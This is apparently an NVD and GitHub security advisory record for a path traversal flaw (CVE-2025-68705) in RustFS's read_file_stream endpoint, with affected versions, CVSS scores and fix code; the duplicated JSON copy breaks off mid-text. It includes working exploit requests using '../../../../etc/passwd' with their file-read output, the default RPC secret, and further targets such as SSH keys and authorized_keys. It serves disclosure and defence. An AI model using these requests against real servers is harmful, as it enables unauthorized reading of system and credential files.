              "matchCriteriaId": "711F7641-A2B2-410B-B05D-6656F9A1798F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha17:*:*:*:rust:*:*",
              "matchCriteriaId": "EB79AC62-2B79-441C-BC09-4C834C32EADA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha18:*:*:*:rust:*:*",
              "matchCriteriaId": "62DE84EE-9F3B-460A-AC13-D2B8CCBC5B4E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha19:*:*:*:rust:*:*",
              "matchCriteriaId": "DEF70599-6550-49D2-9800-FE3249A66568",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha20:*:*:*:rust:*:*",
              "matchCriteriaId": "FDFE93A5-B6D7-482A-A891-4D8844604C07",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha21:*:*:*:rust:*:*",
              "matchCriteriaId": "79AC4F00-B006-46C2-863F-2946BB02B58E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha22:*:*:*:rust:*:*",
              "matchCriteriaId": "E313A243-ED56-498D-988F-E088693EBB61",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha23:*:*:*:rust:*:*",
              "matchCriteriaId": "D3A60CB7-1F01-4A60-8555-C225AC89B959",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha24:*:*:*:rust:*:*",
              "matchCriteriaId": "1C98618D-CF5D-406B-8AA5-34B412F3D43D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha25:*:*:*:rust:*:*",
              "matchCriteriaId": "98373960-FEDB-4933-92D5-2A597045DD23",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha26:*:*:*:rust:*:*",
              "matchCriteriaId": "83E0E1A5-3C07-45FF-80FD-0DB375E1575E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha27:*:*:*:rust:*:*",
              "matchCriteriaId": "C2D66076-4005-4F58-A8E2-69062053D786",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha28:*:*:*:rust:*:*",
              "matchCriteriaId": "1D8CB0F5-299F-4BB0-B264-F5642DD991C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha29:*:*:*:rust:*:*",
              "matchCriteriaId": "96E20418-FE0C-4202-8771-FFF8EBB1B62D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha30:*:*:*:rust:*:*",
              "matchCriteriaId": "810A17F9-AEEA-4396-B437-120789BBE882",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha31:*:*:*:rust:*:*",
              "matchCriteriaId": "7B1FECD4-E993-417D-AEA7-F8E97DC6A5FA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha32:*:*:*:rust:*:*",
              "matchCriteriaId": "3839F299-E0E7-4994-A8AC-B67A534C9847",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha33:*:*:*:rust:*:*",
              "matchCriteriaId": "46CAEA4E-5DFD-4668-ABF0-DC53EB04EE7B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha34:*:*:*:rust:*:*",
              "matchCriteriaId": "591075AB-81EF-4D42-A2A0-FA28BC6B78CC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha35:*:*:*:rust:*:*",
              "matchCriteriaId": "FD46ED07-6DCC-4BF8-A4E8-78B2FF6DCE4C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha36:*:*:*:rust:*:*",
              "matchCriteriaId": "6DF15533-D6E1-49B0-B30A-6FEECC7AE06C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha37:*:*:*:rust:*:*",
              "matchCriteriaId": "EC68F03A-D299-4BFB-A99E-4B08E4E0848F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha38:*:*:*:rust:*:*",
              "matchCriteriaId": "0DD60024-CAB2-4DA6-A9CA-503D2631E98B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha39:*:*:*:rust:*:*",
              "matchCriteriaId": "32470ED0-7873-41A3-B2D5-7CD444ED0A45",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha40:*:*:*:rust:*:*",
              "matchCriteriaId": "E2EFC74D-40E7-426C-9F7B-3B654F2B940F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha41:*:*:*:rust:*:*",
              "matchCriteriaId": "EAAF504E-51A5-492B-887E-BB67788B899C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha42:*:*:*:rust:*:*",
              "matchCriteriaId": "35C83244-D2C7-4D70-9C0B-D0590B00C608",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha43:*:*:*:rust:*:*",
              "matchCriteriaId": "429E4ECD-997A-4D3B-9DE2-60835AE14473",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha44:*:*:*:rust:*:*",
              "matchCriteriaId": "5DDDBAA5-D207-498C-A6F0-79F07806C511",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha45:*:*:*:rust:*:*",
              "matchCriteriaId": "81758B85-6D2B-4914-96EC-E4CCDE2F9A52",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha46:*:*:*:rust:*:*",
              "matchCriteriaId": "D439B484-E32D-4A6A-84EE-9307A028F736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha47:*:*:*:rust:*:*",
              "matchCriteriaId": "FDA137F7-DC8A-44F4-8061-F502AC8DD7BF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha48:*:*:*:rust:*:*",
              "matchCriteriaId": "AE3EF7B3-E8C0-4844-9165-3A26EB426615",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha49:*:*:*:rust:*:*",
              "matchCriteriaId": "EB40D926-AE20-46A7-9B6E-ED1BADB9A08B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha50:*:*:*:rust:*:*",
              "matchCriteriaId": "3A43A950-59A6-4343-815A-953C11DC3F13",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha51:*:*:*:rust:*:*",
              "matchCriteriaId": "87B36190-C30B-45BC-9738-BE0B3321025D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha52:*:*:*:rust:*:*",
              "matchCriteriaId": "86A2967C-E2C6-4C73-9BDE-CCECACDB2B02",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha53:*:*:*:rust:*:*",
              "matchCriteriaId": "5E10A654-E265-4469-8099-ABBB1F5D8BCF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha54:*:*:*:rust:*:*",
              "matchCriteriaId": "762591A8-A0A2-45D2-B15F-1E85DFC5CA86",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha55:*:*:*:rust:*:*",
              "matchCriteriaId": "53DE196C-1914-40AE-854D-4988073D57C3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha56:*:*:*:rust:*:*",
              "matchCriteriaId": "5BE55B7E-3806-4F8A-B09C-7B9D173D3FAE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha57:*:*:*:rust:*:*",
              "matchCriteriaId": "8CF07DA6-11F6-4A19-9FD9-1955EC22C779",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha58:*:*:*:rust:*:*",
              "matchCriteriaId": "1A571B98-0EE7-46A6-8514-3E02F9CE969A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha59:*:*:*:rust:*:*",
              "matchCriteriaId": "3263EEC7-94FF-4802-BCB2-0C3713079439",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha60:*:*:*:rust:*:*",
              "matchCriteriaId": "FA13E6EE-A889-408E-8503-2F57A5E46CE1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha61:*:*:*:rust:*:*",
              "matchCriteriaId": "4D28A63E-ADE5-4DEC-8E75-0884A7011613",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha62:*:*:*:rust:*:*",
              "matchCriteriaId": "21E6129E-565C-45AE-A0C8-2D1B623EEC9D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha63:*:*:*:rust:*:*",
              "matchCriteriaId": "046F640C-18E9-4FC4-812D-8E4CAAFCAE55",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha64:*:*:*:rust:*:*",
              "matchCriteriaId": "BFB217B7-78AA-4D16-9A2B-863BD6CD01B6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha65:*:*:*:rust:*:*",
              "matchCriteriaId": "F8EEF3FF-410B-40F3-A144-CD61ED394109",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha66:*:*:*:rust:*:*",
              "matchCriteriaId": "E3494138-7FE7-4152-935C-C1C35179064B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha67:*:*:*:rust:*:*",
              "matchCriteriaId": "9E0461BC-0E45-4F9F-A837-4D9FC8852A75",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha68:*:*:*:rust:*:*",
              "matchCriteriaId": "E259407D-61CF-4956-A456-57F131334456",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha69:*:*:*:rust:*:*",
              "matchCriteriaId": "B6E44EF8-98A5-47F5-B7E9-3199EB08FAC1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha70:*:*:*:rust:*:*",
              "matchCriteriaId": "F4CBBD85-02F9-491A-8845-59EFB88F2DAF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha71:*:*:*:rust:*:*",
              "matchCriteriaId": "2271380A-3AE1-4954-8D16-5065C8E88D32",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha72:*:*:*:rust:*:*",
              "matchCriteriaId": "DB3F6C7E-71E4-427A-96F4-F62DE0ED9450",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha73:*:*:*:rust:*:*",
              "matchCriteriaId": "980BEAAE-143E-4F28-9A2F-58CED3D296E9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha74:*:*:*:rust:*:*",
              "matchCriteriaId": "8E14C88E-CE9B-44DA-98DE-280C0D6E4C8D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha75:*:*:*:rust:*:*",
              "matchCriteriaId": "EEC13614-61AD-45A7-B7FA-07346D33CACF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha76:*:*:*:rust:*:*",
              "matchCriteriaId": "6B3E9EB0-0A41-4146-B6A9-49B1A70358DC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha77:*:*:*:rust:*:*",
              "matchCriteriaId": "CBDD75C5-1A08-4758-9324-172C1D539322",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha78:*:*:*:rust:*:*",
              "matchCriteriaId": "96461CC0-012C-40D7-B1CB-FF9A6B7EB644",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "RustFS is a distributed object storage system built in Rust. In versions 1.0.0-alpha.13 to 1.0.0-alpha.78, RustFS contains a path traversal vulnerability in the /rustfs/rpc/read_file_stream endpoint. This issue has been patched in version 1.0.0-alpha.79."
    }
  ],
  "id": "CVE-2025-68705",
  "lastModified": "2026-01-16T19:29:47.410",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "PROOF_OF_CONCEPT",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "NONE",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-01-07T21:15:59.383",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/rustfs/rustfs/commit/ab752458ce431c6397175d167beee2ea00507d3e"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/rustfs/rustfs/security/advisories/GHSA-pq29-69jg-9mxc"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-PQ29-69JG-9MXC

Vulnerability from github – Published: 2026-01-07 18:15 – Updated: 2026-01-07 21:34

Summary

RustFS Path Traversal Vulnerability

Details

RustFS Path Traversal Vulnerability

Vulnerability Details

CVE ID:
Severity: Critical (CVSS estimated 9.9)
Impact: Arbitrary File Read/Write
Component: /rustfs/rpc/read_file_stream endpoint
Root Cause: Insufficient path validation in crates/ecstore/src/disk/local.rs:1791

Vulnerable Code

// local.rs:1791 - No path sanitization!
let file_path = volume_dir.join(Path::new(&path)); // DANGEROUS!
check_path_length(file_path.to_string_lossy().to_string().as_str())?; // Only checks length
let mut f = self.open_file(file_path, O_RDONLY, volume_dir).await?;

The code uses PathBuf::join() without: - Canonicalization - Path boundary validation - Protection against ../ sequences - Protection against absolute paths

Proof of Concept

Test Environment

Target: RustFS v0.0.5 (Docker container)
Endpoint: http://localhost:9000/rustfs/rpc/read_file_stream
RPC Secret: rustfsadmin (from RUSTFS_SECRET_KEY)
Disk ID: /data/rustfs0
Volume: .rustfs.sys

Attack Scenario

Exploit Parameters

disk: /data/rustfs0
volume: .rustfs.sys
path: ../../../../etc/passwd  # Path traversal payload
offset: 0
length: 751  # Must match file size

Required Authentication

RPC requests require HMAC-SHA256 signature:

# Signature format: HMAC-SHA256(secret, "{url}|{method}|{timestamp}")
Headers:
  x-rustfs-signature: Base64(HMAC-SHA256(secret, data))
  x-rustfs-timestamp: Unix timestamp

Successful Exploits

1. Read `/etc/passwd` ✅

Request:

GET /rustfs/rpc/read_file_stream?disk=/data/rustfs0&volume=.rustfs.sys&path=../../../../etc/passwd&offset=0&length=751
x-rustfs-signature: QAesB6sNdwKJluifpIhbKyhdK2EEiiyhpvfRJmXZKlg=
x-rustfs-timestamp: 1766482485

Response: HTTP 200 OK

Content Retrieved:

root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
[... 15 more lines ...]
rustfs:x:10001:10001::/home/rustfs:/sbin/nologin

Impact: Full user account enumeration

2. Read `/etc/hosts` ✅

Request:

GET /rustfs/rpc/read_file_stream?disk=/data/rustfs0&volume=.rustfs.sys&path=../../../../etc/hosts&offset=0&length=172

Response: HTTP 200 OK

Content Retrieved:

127.0.0.1   localhost
::1 localhost ip6-localhost ip6-loopback
[...]
172.20.0.3  d25e05a19bd2

Impact: Network configuration disclosure

3. Read `/etc/hostname` ✅

Request:

GET /rustfs/rpc/read_file_stream?disk=/data/rustfs0&volume=.rustfs.sys&path=/etc/hostname&offset=0&length=13

Response: HTTP 200 OK

Content Retrieved:

d25e05a19bd2

Impact: System information disclosure

Technical Analysis

Data Flow

1. HTTP Request
   ↓
2. RPC Signature Verification (verify_rpc_signature)
   ↓
3. Find Disk (find_local_disk)
   ↓
4. Read File Stream (disk.read_file_stream)
   ↓
5. VULNERABLE: volume_dir.join(Path::new(&path))
   ↓
6. File Read: /data/rustfs0/.rustfs.sys/../../../../etc/passwd
              → /etc/passwd

Path Traversal Mechanism

// Example traversal:
volume_dir = PathBuf::from("/data/rustfs0/.rustfs.sys")
path = "../../../../etc/passwd"

// PathBuf::join() resolves to:
file_path = "/data/rustfs0/.rustfs.sys/../../../../etc/passwd"
          = "/etc/passwd"  // Successfully escaped!

Why It Works

No Canonicalization: Code doesn't use canonicalize() before validation
No Boundary Check: No verification that final path is within volume_dir
PathBuf::join() Behavior: Automatically resolves ../ sequences
Length-Only Validation: check_path_length() only checks string length

Special Considerations

File Size Constraint: The length parameter must exactly match file size
Code validates: file.len() >= offset + length
Otherwise returns DiskError::FileCorrupt
Volume Requirement: Volume/bucket must exist (e.g., .rustfs.sys)
Disk Requirement: Disk must be registered in GLOBAL_LOCAL_DISK_MAP

Impact Assessment

Confidentiality Impact: HIGH

✅ Read arbitrary files (demonstrated)
✅ Read system configuration files (/etc/passwd, /etc/hosts)
⚠️ Potential to read:
SSH keys (/root/.ssh/id_rsa)
Application secrets
RustFS configuration files
Environment variables from /proc

Integrity Impact: HIGH

⚠️ Similar vulnerability exists in put_file_stream (not tested)
⚠️ Arbitrary file write likely possible
⚠️ Could write to:
Cron jobs
authorized_keys
System binaries (if permissions allow)

Availability Impact: MEDIUM

⚠️ walk_dir endpoint could enumerate entire filesystem
⚠️ Potential DoS via recursive directory traversal

Exploitation Requirements

Prerequisites

Network Access: Ability to reach RustFS RPC endpoints
RPC Secret Knowledge: Knowledge of RUSTFS_SECRET_KEY
Default: "rustfs-default-secret"
Production: From environment variable or config
Disk/Volume Knowledge: Valid disk ID and volume name
File Size Knowledge: Exact file sizes for successful reads

Attack Complexity

Without Secret: Impossible (signature verification)
With Secret: Trivial (automated script)
With Default Secret: Critical risk if not changed

Mitigation Recommendations

Immediate Actions (Priority 0)

Path Canonicalization

async fn read_file_stream(&self, volume: &str, path: &str, ...) -> Result<FileReader> {
    let volume_dir = self.get_bucket_path(volume)?;

    // CRITICAL FIX:
    let file_path = volume_dir.join(Path::new(&path));
    let canonical = file_path.canonicalize()
        .map_err(|_| DiskError::FileNotFound)?;

    // Validate path is within volume_dir
    if !canonical.starts_with(&volume_dir) {
        error!("Path traversal attempt detected: {:?}", path);
        return Err(DiskError::InvalidArgument);
    }

    // Continue with validated path...
}

Path Component Validation

// Reject dangerous path components
if path.contains("..") || path.starts_with('/') {
    return Err(DiskError::InvalidArgument);
}

Use path-clean Crate

use path_clean::PathClean;

let cleaned_path = PathBuf::from(&path).clean();
if cleaned_path.to_string_lossy().contains("..") {
    return Err(DiskError::InvalidArgument);
}

Additional Security Measures

Audit Logging: Log all RPC file operations with full paths
Rate Limiting: Prevent DoS via repeated RPC calls
Secret Rotation: Ensure unique RPC secrets per deployment
Network Segmentation: Restrict RPC endpoint access
Security Testing: Add path traversal tests to test suite

Long-term Improvements

Chroot Jail: Isolate RPC operations in chroot environment
Least Privilege: Run RustFS with minimal file system permissions
Security Audit: Comprehensive review of all file operations

Proof of Concept Script

The complete PoC is available at: exploit_path_traversal.py

Usage

# Ensure RustFS is running
docker compose ps

# Run exploit
python3 exploit_path_traversal.py

Output

[+] SUCCESS! Read 751 bytes
[+] File content:
================================================================================
root:x:0:0:root:/root:/bin/sh
[... full /etc/passwd content ...]
================================================================================

Acknowledgements

RustFS would like to thank bilisheep from the Xmirror Security Team for discovering and responsibly reporting this vulnerability.

Acknowledgements: RustFS would like to thank @realansgar and bilisheep from the Xmirror Security Team for providing the security report.

Severity ?

8.8 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.0.0-alpha.78"
      },
      "package": {
        "ecosystem": "crates.io",
        "name": "rustfs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0-alpha.13"
            },
            {
              "fixed": "1.0.0-alpha.79"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-68705"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-07T18:15:29Z",
    "nvd_published_at": "2026-01-07T21:15:59Z",
    "severity": "HIGH"
  },
  "details": "# RustFS Path Traversal Vulnerability\n\n## Vulnerability Details\n\n- **CVE ID**: \n- **Severity**: Critical (CVSS estimated 9.9)\n- **Impact**: Arbitrary File Read/Write\n- **Component**: `/rustfs/rpc/read_file_stream` endpoint\n- **Root Cause**: Insufficient path validation in `crates/ecstore/src/disk/local.rs:1791`\n\n### Vulnerable Code\n\n```rust\n// local.rs:1791 - No path sanitization!\nlet file_path = volume_dir.join(Path::new(\u0026path)); // DANGEROUS!\ncheck_path_length(file_path.to_string_lossy().to_string().as_str())?; // Only checks length\nlet mut f = self.open_file(file_path, O_RDONLY, volume_dir).await?;\n```\n\nThe code uses `PathBuf::join()` without:\n- Canonicalization\n- Path boundary validation\n- Protection against `../` sequences\n- Protection against absolute paths\n\n## Proof of Concept\n\n### Test Environment\n\n- **Target**: RustFS v0.0.5 (Docker container)\n- **Endpoint**: `http://localhost:9000/rustfs/rpc/read_file_stream`\n- **RPC Secret**: `rustfsadmin` (from RUSTFS_SECRET_KEY)\n- **Disk ID**: `/data/rustfs0`\n- **Volume**: `.rustfs.sys`\n\n### Attack Scenario\n\n#### Exploit Parameters\n\n```\ndisk: /data/rustfs0\nvolume: .rustfs.sys\npath: ../../../../etc/passwd  # Path traversal payload\noffset: 0\nlength: 751  # Must match file size\n```\n\n#### Required Authentication\n\nRPC requests require HMAC-SHA256 signature:\n\n```python\n# Signature format: HMAC-SHA256(secret, \"{url}|{method}|{timestamp}\")\nHeaders:\n  x-rustfs-signature: Base64(HMAC-SHA256(secret, data))\n  x-rustfs-timestamp: Unix timestamp\n```\n\n### Successful Exploits\n\n#### 1. Read `/etc/passwd` \u2705\n\n**Request:**\n```\nGET /rustfs/rpc/read_file_stream?disk=/data/rustfs0\u0026volume=.rustfs.sys\u0026path=../../../../etc/passwd\u0026offset=0\u0026length=751\nx-rustfs-signature: QAesB6sNdwKJluifpIhbKyhdK2EEiiyhpvfRJmXZKlg=\nx-rustfs-timestamp: 1766482485\n```\n\n**Response:** HTTP 200 OK\n\n**Content Retrieved:**\n```\nroot:x:0:0:root:/root:/bin/sh\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\n[... 15 more lines ...]\nrustfs:x:10001:10001::/home/rustfs:/sbin/nologin\n```\n\n**Impact**: Full user account enumeration\n\n---\n\n#### 2. Read `/etc/hosts` \u2705\n\n**Request:**\n```\nGET /rustfs/rpc/read_file_stream?disk=/data/rustfs0\u0026volume=.rustfs.sys\u0026path=../../../../etc/hosts\u0026offset=0\u0026length=172\n```\n\n**Response:** HTTP 200 OK\n\n**Content Retrieved:**\n```\n127.0.0.1\tlocalhost\n::1\tlocalhost ip6-localhost ip6-loopback\n[...]\n172.20.0.3\td25e05a19bd2\n```\n\n**Impact**: Network configuration disclosure\n\n---\n\n#### 3. Read `/etc/hostname` \u2705\n\n**Request:**\n```\nGET /rustfs/rpc/read_file_stream?disk=/data/rustfs0\u0026volume=.rustfs.sys\u0026path=/etc/hostname\u0026offset=0\u0026length=13\n```\n\n**Response:** HTTP 200 OK\n\n**Content Retrieved:**\n```\nd25e05a19bd2\n```\n\n**Impact**: System information disclosure\n\n---\n\n## Technical Analysis\n\n### Data Flow\n\n```\n1. HTTP Request\n   \u2193\n2. RPC Signature Verification (verify_rpc_signature)\n   \u2193\n3. Find Disk (find_local_disk)\n   \u2193\n4. Read File Stream (disk.read_file_stream)\n   \u2193\n5. VULNERABLE: volume_dir.join(Path::new(\u0026path))\n   \u2193\n6. File Read: /data/rustfs0/.rustfs.sys/../../../../etc/passwd\n              \u2192 /etc/passwd\n```\n\n### Path Traversal Mechanism\n\n```rust\n// Example traversal:\nvolume_dir = PathBuf::from(\"/data/rustfs0/.rustfs.sys\")\npath = \"../../../../etc/passwd\"\n\n// PathBuf::join() resolves to:\nfile_path = \"/data/rustfs0/.rustfs.sys/../../../../etc/passwd\"\n          = \"/etc/passwd\"  // Successfully escaped!\n```\n\n### Why It Works\n\n1. **No Canonicalization**: Code doesn\u0027t use `canonicalize()` before validation\n2. **No Boundary Check**: No verification that final path is within volume_dir\n3. **PathBuf::join() Behavior**: Automatically resolves `../` sequences\n4. **Length-Only Validation**: `check_path_length()` only checks string length\n\n### Special Considerations\n\n- **File Size Constraint**: The `length` parameter must exactly match file size\n  - Code validates: `file.len() \u003e= offset + length`\n  - Otherwise returns `DiskError::FileCorrupt`\n- **Volume Requirement**: Volume/bucket must exist (e.g., `.rustfs.sys`)\n- **Disk Requirement**: Disk must be registered in `GLOBAL_LOCAL_DISK_MAP`\n\n## Impact Assessment\n\n### Confidentiality Impact: HIGH\n\n- \u2705 Read arbitrary files (demonstrated)\n- \u2705 Read system configuration files (`/etc/passwd`, `/etc/hosts`)\n- \u26a0\ufe0f Potential to read:\n  - SSH keys (`/root/.ssh/id_rsa`)\n  - Application secrets\n  - RustFS configuration files\n  - Environment variables from `/proc`\n\n### Integrity Impact: HIGH\n\n- \u26a0\ufe0f Similar vulnerability exists in `put_file_stream` (not tested)\n- \u26a0\ufe0f Arbitrary file write likely possible\n- \u26a0\ufe0f Could write to:\n  - Cron jobs\n  - authorized_keys\n  